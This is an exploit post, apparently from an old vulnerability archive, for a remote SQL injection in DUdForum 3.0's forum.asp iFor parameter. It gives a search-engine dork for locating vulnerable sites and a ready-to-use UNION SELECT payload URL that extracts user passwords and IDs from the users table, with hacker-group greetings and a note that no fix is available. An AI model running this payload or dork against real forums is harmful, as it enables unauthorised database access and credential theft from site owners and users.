DUdForum 3.0 (forum.asp iFor) Remote SQL Injection Vulnerability

2008-06-22 00:00:00

# #
# Bl@ckbe@rD ('Tunisian TerrorisT') #
# #
------------------------- #$$$$$$$$$$$$$$$$$$$$$$$#----------------------------------------

[+] Script Name : DUdForum 3.0 Rem0te SQL Injection EXploit

|+| Team : InjEct0r5

[+] Author : Bl@ckbe@rD ('Tunisian TerrorisT')

[+] Contact : blackbeard-sql[A.T]hotmail{.}fr

[+] Home : http://www.underz0ne.com

[+] Dork : Powered by DUdforum 3.0 inurl:/forums.asp?iFor=

--//-->

[+] Expl0iT :

http://www.site.xx/forum/forum.asp?iFor={sql}

http://www.site.xx/forum/forum.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
--//-->

[+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew...

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.